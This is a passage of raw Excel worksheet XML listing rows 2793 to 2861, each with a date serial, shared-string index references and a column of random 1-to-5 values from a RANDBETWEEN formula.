      <c r="B2793" t="s">
        <v>19</v>
      </c>
      <c r="C2793" t="s">
        <v>41</v>
      </c>
      <c r="E2793" t="s">
        <v>2735</v>
      </c>
      <c r="F2793">
        <f t="shared" ca="1" si="43"/>
        <v>2</v>
      </c>
    </row>
    <row r="2794" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2794" s="1">
        <v>43506.961550925924</v>
      </c>
      <c r="B2794" t="s">
        <v>5</v>
      </c>
      <c r="C2794" t="s">
        <v>41</v>
      </c>
      <c r="E2794" t="s">
        <v>2736</v>
      </c>
      <c r="F2794">
        <f t="shared" ca="1" si="43"/>
        <v>5</v>
      </c>
    </row>
    <row r="2795" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A2795" s="1">
        <v>43506.943148148152</v>
      </c>
      <c r="B2795" t="s">
        <v>5</v>
      </c>
      <c r="C2795" t="s">
        <v>260</v>
      </c>
      <c r="E2795" s="2" t="s">
        <v>2737</v>
      </c>
      <c r="F2795">
        <f t="shared" ca="1" si="43"/>
        <v>1</v>
      </c>
    </row>
    <row r="2796" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A2796" s="1">
        <v>43506.933831018519</v>
      </c>
      <c r="B2796" t="s">
        <v>5</v>
      </c>
      <c r="C2796" t="s">
        <v>10</v>
      </c>
      <c r="D2796" t="s">
        <v>89</v>
      </c>
      <c r="E2796" s="2" t="s">
        <v>2738</v>
      </c>
      <c r="F2796">
        <f t="shared" ca="1" si="43"/>
        <v>3</v>
      </c>
    </row>
    <row r="2797" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A2797" s="1">
        <v>43506.894999999997</v>
      </c>
      <c r="B2797" t="s">
        <v>5</v>
      </c>
      <c r="C2797" t="s">
        <v>260</v>
      </c>
      <c r="E2797" s="2" t="s">
        <v>2739</v>
      </c>
      <c r="F2797">
        <f t="shared" ca="1" si="43"/>
        <v>1</v>
      </c>
    </row>
    <row r="2798" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2798" s="1">
        <v>43506.791631944441</v>
      </c>
      <c r="B2798" t="s">
        <v>19</v>
      </c>
      <c r="C2798" t="s">
        <v>10</v>
      </c>
      <c r="D2798" t="s">
        <v>94</v>
      </c>
      <c r="E2798" t="s">
        <v>2740</v>
      </c>
      <c r="F2798">
        <f t="shared" ca="1" si="43"/>
        <v>1</v>
      </c>
    </row>
    <row r="2799" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2799" s="1">
        <v>43506.230451388888</v>
      </c>
      <c r="B2799" t="s">
        <v>5</v>
      </c>
      <c r="C2799" t="s">
        <v>1688</v>
      </c>
      <c r="E2799" t="s">
        <v>2741</v>
      </c>
      <c r="F2799">
        <f t="shared" ca="1" si="43"/>
        <v>5</v>
      </c>
    </row>
    <row r="2800" spans="1:6" ht="405" x14ac:dyDescent="0.25">
      <c r="A2800" s="1">
        <v>43506.207777777781</v>
      </c>
      <c r="B2800" t="s">
        <v>13</v>
      </c>
      <c r="C2800" t="s">
        <v>10</v>
      </c>
      <c r="D2800" t="s">
        <v>6</v>
      </c>
      <c r="E2800" s="2" t="s">
        <v>2742</v>
      </c>
      <c r="F2800">
        <f t="shared" ca="1" si="43"/>
        <v>4</v>
      </c>
    </row>
    <row r="2801" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2801" s="1">
        <v>43506.02616898148</v>
      </c>
      <c r="B2801" t="s">
        <v>19</v>
      </c>
      <c r="C2801" t="s">
        <v>2745</v>
      </c>
      <c r="E2801" t="s">
        <v>2743</v>
      </c>
      <c r="F2801">
        <f t="shared" ca="1" si="43"/>
        <v>3</v>
      </c>
    </row>
    <row r="2802" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A2802" s="1">
        <v>43505.968634259261</v>
      </c>
      <c r="B2802" t="s">
        <v>5</v>
      </c>
      <c r="C2802" t="s">
        <v>41</v>
      </c>
      <c r="E2802" s="2" t="s">
        <v>2746</v>
      </c>
      <c r="F2802">
        <f t="shared" ca="1" si="43"/>
        <v>4</v>
      </c>
    </row>
    <row r="2803" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2803" s="1">
        <v>43505.884282407409</v>
      </c>
      <c r="B2803" t="s">
        <v>5</v>
      </c>
      <c r="C2803" t="s">
        <v>260</v>
      </c>
      <c r="E2803" t="s">
        <v>2747</v>
      </c>
      <c r="F2803">
        <f t="shared" ca="1" si="43"/>
        <v>2</v>
      </c>
    </row>
    <row r="2804" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2804" s="1">
        <v>43505.30736111111</v>
      </c>
      <c r="B2804" t="s">
        <v>5</v>
      </c>
      <c r="C2804" t="s">
        <v>71</v>
      </c>
      <c r="E2804" t="s">
        <v>2748</v>
      </c>
      <c r="F2804">
        <f t="shared" ca="1" si="43"/>
        <v>1</v>
      </c>
    </row>
    <row r="2805" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A2805" s="1">
        <v>43505.27548611111</v>
      </c>
      <c r="B2805" t="s">
        <v>1305</v>
      </c>
      <c r="C2805" t="s">
        <v>48</v>
      </c>
      <c r="E2805" s="2" t="s">
        <v>2749</v>
      </c>
      <c r="F2805">
        <f t="shared" ca="1" si="43"/>
        <v>5</v>
      </c>
    </row>
    <row r="2806" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2806" s="1">
        <v>43505.244791666664</v>
      </c>
      <c r="B2806" t="s">
        <v>19</v>
      </c>
      <c r="C2806" t="s">
        <v>41</v>
      </c>
      <c r="E2806" t="s">
        <v>2750</v>
      </c>
      <c r="F2806">
        <f t="shared" ca="1" si="43"/>
        <v>4</v>
      </c>
    </row>
    <row r="2807" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2807" s="1">
        <v>43505.233854166669</v>
      </c>
      <c r="B2807" t="s">
        <v>5</v>
      </c>
      <c r="C2807" t="s">
        <v>10</v>
      </c>
      <c r="D2807" t="s">
        <v>6</v>
      </c>
      <c r="E2807" t="s">
        <v>2751</v>
      </c>
      <c r="F2807">
        <f t="shared" ca="1" si="43"/>
        <v>5</v>
      </c>
    </row>
    <row r="2808" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2808" s="1">
        <v>43505.215949074074</v>
      </c>
      <c r="B2808" t="s">
        <v>5</v>
      </c>
      <c r="C2808" t="s">
        <v>41</v>
      </c>
      <c r="E2808" t="s">
        <v>2752</v>
      </c>
      <c r="F2808">
        <f t="shared" ca="1" si="43"/>
        <v>3</v>
      </c>
    </row>
    <row r="2809" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A2809" s="1">
        <v>43505.20108796296</v>
      </c>
      <c r="B2809" t="s">
        <v>5</v>
      </c>
      <c r="C2809" t="s">
        <v>48</v>
      </c>
      <c r="E2809" s="2" t="s">
        <v>2753</v>
      </c>
      <c r="F2809">
        <f t="shared" ca="1" si="43"/>
        <v>5</v>
      </c>
    </row>
    <row r="2810" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2810" s="1">
        <v>43505.060949074075</v>
      </c>
      <c r="B2810" t="s">
        <v>13</v>
      </c>
      <c r="C2810" t="s">
        <v>10</v>
      </c>
      <c r="E2810" t="s">
        <v>2754</v>
      </c>
      <c r="F2810">
        <f t="shared" ca="1" si="43"/>
        <v>2</v>
      </c>
    </row>
    <row r="2811" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A2811" s="1">
        <v>43505.051782407405</v>
      </c>
      <c r="B2811" t="s">
        <v>13</v>
      </c>
      <c r="C2811" t="s">
        <v>454</v>
      </c>
      <c r="E2811" s="2" t="s">
        <v>2755</v>
      </c>
      <c r="F2811">
        <f t="shared" ca="1" si="43"/>
        <v>4</v>
      </c>
    </row>
    <row r="2812" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A2812" s="1">
        <v>43505.048402777778</v>
      </c>
      <c r="B2812" t="s">
        <v>5</v>
      </c>
      <c r="C2812" t="s">
        <v>41</v>
      </c>
      <c r="E2812" s="2" t="s">
        <v>2756</v>
      </c>
      <c r="F2812">
        <f t="shared" ca="1" si="43"/>
        <v>1</v>
      </c>
    </row>
    <row r="2813" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2813" s="1">
        <v>43505.009618055556</v>
      </c>
      <c r="B2813" t="s">
        <v>5</v>
      </c>
      <c r="C2813" t="s">
        <v>10</v>
      </c>
      <c r="D2813" t="s">
        <v>667</v>
      </c>
      <c r="F2813">
        <f t="shared" ca="1" si="43"/>
        <v>5</v>
      </c>
    </row>
    <row r="2814" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2814" s="1">
        <v>43504.988391203704</v>
      </c>
      <c r="B2814" t="s">
        <v>13</v>
      </c>
      <c r="C2814" t="s">
        <v>10</v>
      </c>
      <c r="D2814" t="s">
        <v>163</v>
      </c>
      <c r="E2814" t="s">
        <v>2757</v>
      </c>
      <c r="F2814">
        <f t="shared" ca="1" si="43"/>
        <v>4</v>
      </c>
    </row>
    <row r="2815" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2815" s="1">
        <v>43504.831979166665</v>
      </c>
      <c r="B2815" t="s">
        <v>1305</v>
      </c>
      <c r="C2815" t="s">
        <v>41</v>
      </c>
      <c r="E2815" t="s">
        <v>2758</v>
      </c>
      <c r="F2815">
        <f t="shared" ca="1" si="43"/>
        <v>2</v>
      </c>
    </row>
    <row r="2816" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2816" s="1">
        <v>43504.82472222222</v>
      </c>
      <c r="B2816" t="s">
        <v>5</v>
      </c>
      <c r="C2816" t="s">
        <v>10</v>
      </c>
      <c r="D2816" t="s">
        <v>374</v>
      </c>
      <c r="E2816" t="s">
        <v>2759</v>
      </c>
      <c r="F2816">
        <f t="shared" ca="1" si="43"/>
        <v>2</v>
      </c>
    </row>
    <row r="2817" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A2817" s="1">
        <v>43504.807256944441</v>
      </c>
      <c r="B2817" t="s">
        <v>1305</v>
      </c>
      <c r="C2817" t="s">
        <v>10</v>
      </c>
      <c r="D2817" t="s">
        <v>6</v>
      </c>
      <c r="E2817" s="2" t="s">
        <v>2760</v>
      </c>
      <c r="F2817">
        <f t="shared" ca="1" si="43"/>
        <v>4</v>
      </c>
    </row>
    <row r="2818" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2818" s="1">
        <v>43504.73673611111</v>
      </c>
      <c r="B2818" t="s">
        <v>19</v>
      </c>
      <c r="C2818" t="s">
        <v>10</v>
      </c>
      <c r="D2818" t="s">
        <v>885</v>
      </c>
      <c r="E2818" t="s">
        <v>2761</v>
      </c>
      <c r="F2818">
        <f t="shared" ref="F2818:F2881" ca="1" si="44">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="2819" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A2819" s="1">
        <v>43504.734953703701</v>
      </c>
      <c r="B2819" t="s">
        <v>19</v>
      </c>
      <c r="C2819" t="s">
        <v>10</v>
      </c>
      <c r="D2819" t="s">
        <v>20</v>
      </c>
      <c r="E2819" s="2" t="s">
        <v>2762</v>
      </c>
      <c r="F2819">
        <f t="shared" ca="1" si="44"/>
        <v>2</v>
      </c>
    </row>
    <row r="2820" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2820" s="1">
        <v>43504.715497685182</v>
      </c>
      <c r="B2820" t="s">
        <v>13</v>
      </c>
      <c r="C2820" t="s">
        <v>6</v>
      </c>
      <c r="D2820" t="s">
        <v>114</v>
      </c>
      <c r="E2820" t="s">
        <v>2763</v>
      </c>
      <c r="F2820">
        <f t="shared" ca="1" si="44"/>
        <v>5</v>
      </c>
    </row>
    <row r="2821" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2821" s="1">
        <v>43504.711863425924</v>
      </c>
      <c r="B2821" t="s">
        <v>5</v>
      </c>
      <c r="C2821" t="s">
        <v>10</v>
      </c>
      <c r="D2821" t="s">
        <v>178</v>
      </c>
      <c r="E2821" t="s">
        <v>1846</v>
      </c>
      <c r="F2821">
        <f t="shared" ca="1" si="44"/>
        <v>3</v>
      </c>
    </row>
    <row r="2822" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2822" s="1">
        <v>43504.677708333336</v>
      </c>
      <c r="B2822" t="s">
        <v>13</v>
      </c>
      <c r="C2822" t="s">
        <v>10</v>
      </c>
      <c r="D2822" t="s">
        <v>336</v>
      </c>
      <c r="E2822" t="s">
        <v>2764</v>
      </c>
      <c r="F2822">
        <f t="shared" ca="1" si="44"/>
        <v>2</v>
      </c>
    </row>
    <row r="2823" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A2823" s="1">
        <v>43504.677268518521</v>
      </c>
      <c r="B2823" t="s">
        <v>5</v>
      </c>
      <c r="C2823" t="s">
        <v>6</v>
      </c>
      <c r="D2823" t="s">
        <v>194</v>
      </c>
      <c r="E2823" s="2" t="s">
        <v>2765</v>
      </c>
      <c r="F2823">
        <f t="shared" ca="1" si="44"/>
        <v>5</v>
      </c>
    </row>
    <row r="2824" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2824" s="1">
        <v>43504.669224537036</v>
      </c>
      <c r="B2824" t="s">
        <v>5</v>
      </c>
      <c r="C2824" t="s">
        <v>10</v>
      </c>
      <c r="D2824" t="s">
        <v>178</v>
      </c>
      <c r="E2824" t="s">
        <v>2766</v>
      </c>
      <c r="F2824">
        <f t="shared" ca="1" si="44"/>
        <v>1</v>
      </c>
    </row>
    <row r="2825" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A2825" s="1">
        <v>43504.639282407406</v>
      </c>
      <c r="B2825" t="s">
        <v>5</v>
      </c>
      <c r="C2825" t="s">
        <v>10</v>
      </c>
      <c r="D2825" t="s">
        <v>6</v>
      </c>
      <c r="E2825" s="2" t="s">
        <v>2767</v>
      </c>
      <c r="F2825">
        <f t="shared" ca="1" si="44"/>
        <v>3</v>
      </c>
    </row>
    <row r="2826" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2826" s="1">
        <v>43504.635428240741</v>
      </c>
      <c r="B2826" t="s">
        <v>19</v>
      </c>
      <c r="C2826" t="s">
        <v>10</v>
      </c>
      <c r="D2826" t="s">
        <v>163</v>
      </c>
      <c r="E2826" t="s">
        <v>2768</v>
      </c>
      <c r="F2826">
        <f t="shared" ca="1" si="44"/>
        <v>4</v>
      </c>
    </row>
    <row r="2827" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2827" s="1">
        <v>43504.635034722225</v>
      </c>
      <c r="B2827" t="s">
        <v>5</v>
      </c>
      <c r="C2827" t="s">
        <v>10</v>
      </c>
      <c r="D2827" t="s">
        <v>163</v>
      </c>
      <c r="E2827" t="s">
        <v>2769</v>
      </c>
      <c r="F2827">
        <f t="shared" ca="1" si="44"/>
        <v>3</v>
      </c>
    </row>
    <row r="2828" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A2828" s="1">
        <v>43504.628298611111</v>
      </c>
      <c r="B2828" t="s">
        <v>19</v>
      </c>
      <c r="C2828" t="s">
        <v>10</v>
      </c>
      <c r="D2828" t="s">
        <v>41</v>
      </c>
      <c r="E2828" s="2" t="s">
        <v>2770</v>
      </c>
      <c r="F2828">
        <f t="shared" ca="1" si="44"/>
        <v>2</v>
      </c>
    </row>
    <row r="2829" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A2829" s="1">
        <v>43504.618506944447</v>
      </c>
      <c r="B2829" t="s">
        <v>19</v>
      </c>
      <c r="C2829" t="s">
        <v>10</v>
      </c>
      <c r="D2829" t="s">
        <v>52</v>
      </c>
      <c r="E2829" s="2" t="s">
        <v>2771</v>
      </c>
      <c r="F2829">
        <f t="shared" ca="1" si="44"/>
        <v>4</v>
      </c>
    </row>
    <row r="2830" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A2830" s="1">
        <v>43504.617083333331</v>
      </c>
      <c r="B2830" t="s">
        <v>19</v>
      </c>
      <c r="C2830" t="s">
        <v>10</v>
      </c>
      <c r="D2830" t="s">
        <v>52</v>
      </c>
      <c r="E2830" s="2" t="s">
        <v>2772</v>
      </c>
      <c r="F2830">
        <f t="shared" ca="1" si="44"/>
        <v>5</v>
      </c>
    </row>
    <row r="2831" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2831" s="1">
        <v>43504.615763888891</v>
      </c>
      <c r="B2831" t="s">
        <v>1305</v>
      </c>
      <c r="C2831" t="s">
        <v>6</v>
      </c>
      <c r="D2831" t="s">
        <v>194</v>
      </c>
      <c r="E2831" t="s">
        <v>2773</v>
      </c>
      <c r="F2831">
        <f t="shared" ca="1" si="44"/>
        <v>2</v>
      </c>
    </row>
    <row r="2832" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2832" s="1">
        <v>43504.594699074078</v>
      </c>
      <c r="B2832" t="s">
        <v>19</v>
      </c>
      <c r="C2832" t="s">
        <v>6</v>
      </c>
      <c r="D2832" t="s">
        <v>25</v>
      </c>
      <c r="E2832" t="s">
        <v>2774</v>
      </c>
      <c r="F2832">
        <f t="shared" ca="1" si="44"/>
        <v>5</v>
      </c>
    </row>
    <row r="2833" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2833" s="1">
        <v>43504.58834490741</v>
      </c>
      <c r="B2833" t="s">
        <v>13</v>
      </c>
      <c r="C2833" t="s">
        <v>6</v>
      </c>
      <c r="D2833" t="s">
        <v>25</v>
      </c>
      <c r="E2833" t="s">
        <v>2775</v>
      </c>
      <c r="F2833">
        <f t="shared" ca="1" si="44"/>
        <v>1</v>
      </c>
    </row>
    <row r="2834" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2834" s="1">
        <v>43504.57167824074</v>
      </c>
      <c r="B2834" t="s">
        <v>35</v>
      </c>
      <c r="C2834" t="s">
        <v>865</v>
      </c>
      <c r="F2834">
        <f t="shared" ca="1" si="44"/>
        <v>1</v>
      </c>
    </row>
    <row r="2835" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2835" s="1">
        <v>43504.544571759259</v>
      </c>
      <c r="B2835" t="s">
        <v>5</v>
      </c>
      <c r="C2835" t="s">
        <v>173</v>
      </c>
      <c r="E2835" t="s">
        <v>2776</v>
      </c>
      <c r="F2835">
        <f t="shared" ca="1" si="44"/>
        <v>2</v>
      </c>
    </row>
    <row r="2836" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2836" s="1">
        <v>43504.53052083333</v>
      </c>
      <c r="B2836" t="s">
        <v>5</v>
      </c>
      <c r="C2836" t="s">
        <v>10</v>
      </c>
      <c r="D2836" t="s">
        <v>89</v>
      </c>
      <c r="E2836" t="s">
        <v>2777</v>
      </c>
      <c r="F2836">
        <f t="shared" ca="1" si="44"/>
        <v>4</v>
      </c>
    </row>
    <row r="2837" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A2837" s="1">
        <v>43504.529513888891</v>
      </c>
      <c r="B2837" t="s">
        <v>19</v>
      </c>
      <c r="C2837" t="s">
        <v>10</v>
      </c>
      <c r="D2837" t="s">
        <v>494</v>
      </c>
      <c r="E2837" s="2" t="s">
        <v>2778</v>
      </c>
      <c r="F2837">
        <f t="shared" ca="1" si="44"/>
        <v>3</v>
      </c>
    </row>
    <row r="2838" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2838" s="1">
        <v>43504.528148148151</v>
      </c>
      <c r="B2838" t="s">
        <v>5</v>
      </c>
      <c r="C2838" t="s">
        <v>10</v>
      </c>
      <c r="D2838" t="s">
        <v>192</v>
      </c>
      <c r="E2838" t="s">
        <v>2779</v>
      </c>
      <c r="F2838">
        <f t="shared" ca="1" si="44"/>
        <v>3</v>
      </c>
    </row>
    <row r="2839" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A2839" s="1">
        <v>43504.526585648149</v>
      </c>
      <c r="B2839" t="s">
        <v>5</v>
      </c>
      <c r="C2839" t="s">
        <v>10</v>
      </c>
      <c r="D2839" t="s">
        <v>192</v>
      </c>
      <c r="E2839" s="2" t="s">
        <v>2780</v>
      </c>
      <c r="F2839">
        <f t="shared" ca="1" si="44"/>
        <v>4</v>
      </c>
    </row>
    <row r="2840" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2840" s="1">
        <v>43504.496574074074</v>
      </c>
      <c r="B2840" t="s">
        <v>19</v>
      </c>
      <c r="C2840" t="s">
        <v>10</v>
      </c>
      <c r="D2840" t="s">
        <v>112</v>
      </c>
      <c r="E2840" t="s">
        <v>2781</v>
      </c>
      <c r="F2840">
        <f t="shared" ca="1" si="44"/>
        <v>3</v>
      </c>
    </row>
    <row r="2841" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A2841" s="1">
        <v>43504.482638888891</v>
      </c>
      <c r="B2841" t="s">
        <v>19</v>
      </c>
      <c r="C2841" t="s">
        <v>107</v>
      </c>
      <c r="E2841" s="2" t="s">
        <v>2782</v>
      </c>
      <c r="F2841">
        <f t="shared" ca="1" si="44"/>
        <v>1</v>
      </c>
    </row>
    <row r="2842" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2842" s="1">
        <v>43504.475243055553</v>
      </c>
      <c r="B2842" t="s">
        <v>5</v>
      </c>
      <c r="C2842" t="s">
        <v>10</v>
      </c>
      <c r="D2842" t="s">
        <v>23</v>
      </c>
      <c r="E2842" t="s">
        <v>28</v>
      </c>
      <c r="F2842">
        <f t="shared" ca="1" si="44"/>
        <v>2</v>
      </c>
    </row>
    <row r="2843" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2843" s="1">
        <v>43504.470601851855</v>
      </c>
      <c r="B2843" t="s">
        <v>19</v>
      </c>
      <c r="C2843" t="s">
        <v>10</v>
      </c>
      <c r="D2843" t="s">
        <v>290</v>
      </c>
      <c r="E2843" t="s">
        <v>2783</v>
      </c>
      <c r="F2843">
        <f t="shared" ca="1" si="44"/>
        <v>1</v>
      </c>
    </row>
    <row r="2844" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2844" s="1">
        <v>43504.467673611114</v>
      </c>
      <c r="B2844" t="s">
        <v>13</v>
      </c>
      <c r="C2844" t="s">
        <v>10</v>
      </c>
      <c r="D2844" t="s">
        <v>263</v>
      </c>
      <c r="E2844" t="s">
        <v>2784</v>
      </c>
      <c r="F2844">
        <f t="shared" ca="1" si="44"/>
        <v>5</v>
      </c>
    </row>
    <row r="2845" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A2845" s="1">
        <v>43504.45553240741</v>
      </c>
      <c r="B2845" t="s">
        <v>5</v>
      </c>
      <c r="C2845" t="s">
        <v>542</v>
      </c>
      <c r="E2845" s="2" t="s">
        <v>2785</v>
      </c>
      <c r="F2845">
        <f t="shared" ca="1" si="44"/>
        <v>2</v>
      </c>
    </row>
    <row r="2846" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A2846" s="1">
        <v>43504.439398148148</v>
      </c>
      <c r="B2846" t="s">
        <v>13</v>
      </c>
      <c r="C2846" t="s">
        <v>10</v>
      </c>
      <c r="D2846" t="s">
        <v>192</v>
      </c>
      <c r="E2846" s="2" t="s">
        <v>2786</v>
      </c>
      <c r="F2846">
        <f t="shared" ca="1" si="44"/>
        <v>3</v>
      </c>
    </row>
    <row r="2847" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2847" s="1">
        <v>43504.426562499997</v>
      </c>
      <c r="B2847" t="s">
        <v>5</v>
      </c>
      <c r="C2847" t="s">
        <v>10</v>
      </c>
      <c r="D2847" t="s">
        <v>158</v>
      </c>
      <c r="E2847" t="s">
        <v>2787</v>
      </c>
      <c r="F2847">
        <f t="shared" ca="1" si="44"/>
        <v>3</v>
      </c>
    </row>
    <row r="2848" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A2848" s="1">
        <v>43504.426134259258</v>
      </c>
      <c r="B2848" t="s">
        <v>5</v>
      </c>
      <c r="C2848" t="s">
        <v>10</v>
      </c>
      <c r="D2848" t="s">
        <v>23</v>
      </c>
      <c r="E2848" s="2" t="s">
        <v>2788</v>
      </c>
      <c r="F2848">
        <f t="shared" ca="1" si="44"/>
        <v>2</v>
      </c>
    </row>
    <row r="2849" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A2849" s="1">
        <v>43504.406701388885</v>
      </c>
      <c r="B2849" t="s">
        <v>1305</v>
      </c>
      <c r="C2849" t="s">
        <v>10</v>
      </c>
      <c r="D2849" t="s">
        <v>6</v>
      </c>
      <c r="E2849" s="2" t="s">
        <v>2789</v>
      </c>
      <c r="F2849">
        <f t="shared" ca="1" si="44"/>
        <v>2</v>
      </c>
    </row>
    <row r="2850" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A2850" s="1">
        <v>43504.397638888891</v>
      </c>
      <c r="B2850" t="s">
        <v>19</v>
      </c>
      <c r="C2850" t="s">
        <v>559</v>
      </c>
      <c r="E2850" s="2" t="s">
        <v>2790</v>
      </c>
      <c r="F2850">
        <f t="shared" ca="1" si="44"/>
        <v>3</v>
      </c>
    </row>
    <row r="2851" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2851" s="1">
        <v>43504.394780092596</v>
      </c>
      <c r="B2851" t="s">
        <v>13</v>
      </c>
      <c r="C2851" t="s">
        <v>10</v>
      </c>
      <c r="D2851" t="s">
        <v>271</v>
      </c>
      <c r="E2851" t="s">
        <v>2791</v>
      </c>
      <c r="F2851">
        <f t="shared" ca="1" si="44"/>
        <v>5</v>
      </c>
    </row>
    <row r="2852" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A2852" s="1">
        <v>43504.348483796297</v>
      </c>
      <c r="B2852" t="s">
        <v>19</v>
      </c>
      <c r="C2852" t="s">
        <v>10</v>
      </c>
      <c r="D2852" t="s">
        <v>151</v>
      </c>
      <c r="E2852" s="2" t="s">
        <v>2792</v>
      </c>
      <c r="F2852">
        <f t="shared" ca="1" si="44"/>
        <v>3</v>
      </c>
    </row>
    <row r="2853" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A2853" s="1">
        <v>43504.34847222222</v>
      </c>
      <c r="B2853" t="s">
        <v>19</v>
      </c>
      <c r="C2853" t="s">
        <v>10</v>
      </c>
      <c r="D2853" t="s">
        <v>151</v>
      </c>
      <c r="E2853" s="2" t="s">
        <v>2792</v>
      </c>
      <c r="F2853">
        <f t="shared" ca="1" si="44"/>
        <v>5</v>
      </c>
    </row>
    <row r="2854" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2854" s="1">
        <v>43504.346504629626</v>
      </c>
      <c r="B2854" t="s">
        <v>5</v>
      </c>
      <c r="C2854" t="s">
        <v>41</v>
      </c>
      <c r="E2854" t="s">
        <v>2793</v>
      </c>
      <c r="F2854">
        <f t="shared" ca="1" si="44"/>
        <v>5</v>
      </c>
    </row>
    <row r="2855" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A2855" s="1">
        <v>43504.308703703704</v>
      </c>
      <c r="B2855" t="s">
        <v>19</v>
      </c>
      <c r="C2855" t="s">
        <v>559</v>
      </c>
      <c r="E2855" s="2" t="s">
        <v>2794</v>
      </c>
      <c r="F2855">
        <f t="shared" ca="1" si="44"/>
        <v>5</v>
      </c>
    </row>
    <row r="2856" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A2856" s="1">
        <v>43504.29724537037</v>
      </c>
      <c r="B2856" t="s">
        <v>19</v>
      </c>
      <c r="C2856" t="s">
        <v>71</v>
      </c>
      <c r="E2856" s="2" t="s">
        <v>2795</v>
      </c>
      <c r="F2856">
        <f t="shared" ca="1" si="44"/>
        <v>1</v>
      </c>
    </row>
    <row r="2857" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2857" s="1">
        <v>43504.289097222223</v>
      </c>
      <c r="B2857" t="s">
        <v>13</v>
      </c>
      <c r="C2857" t="s">
        <v>430</v>
      </c>
      <c r="E2857" t="s">
        <v>2796</v>
      </c>
      <c r="F2857">
        <f t="shared" ca="1" si="44"/>
        <v>4</v>
      </c>
    </row>
    <row r="2858" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2858" s="1">
        <v>43504.289074074077</v>
      </c>
      <c r="B2858" t="s">
        <v>13</v>
      </c>
      <c r="C2858" t="s">
        <v>430</v>
      </c>
      <c r="E2858" t="s">
        <v>2796</v>
      </c>
      <c r="F2858">
        <f t="shared" ca="1" si="44"/>
        <v>5</v>
      </c>
    </row>
    <row r="2859" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2859" s="1">
        <v>43504.27952546296</v>
      </c>
      <c r="B2859" t="s">
        <v>19</v>
      </c>
      <c r="C2859" t="s">
        <v>41</v>
      </c>
      <c r="E2859" t="s">
        <v>2667</v>
      </c>
      <c r="F2859">
        <f t="shared" ca="1" si="44"/>
        <v>2</v>
      </c>
    </row>
    <row r="2860" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A2860" s="1">
        <v>43504.249236111114</v>
      </c>
      <c r="B2860" t="s">
        <v>19</v>
      </c>
      <c r="C2860" t="s">
        <v>41</v>
      </c>
      <c r="E2860" s="2" t="s">
        <v>2797</v>
      </c>
      <c r="F2860">
        <f t="shared" ca="1" si="44"/>
        <v>4</v>
      </c>
    </row>
    <row r="2861" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A2861" s="1">
        <v>43504.23233796296</v>
      </c>
      <c r="B2861" t="s">
        <v>5</v>
      </c>
      <c r="C2861" t="s">
        <v>461</v>
      </c>
      <c r="E2861" s="2" t="s">
        <v>2798</v>
      </c>
      <c r="F2861">
        <f t="shared" ca="1" si="44"/>
        <v>1</v>
      </c>
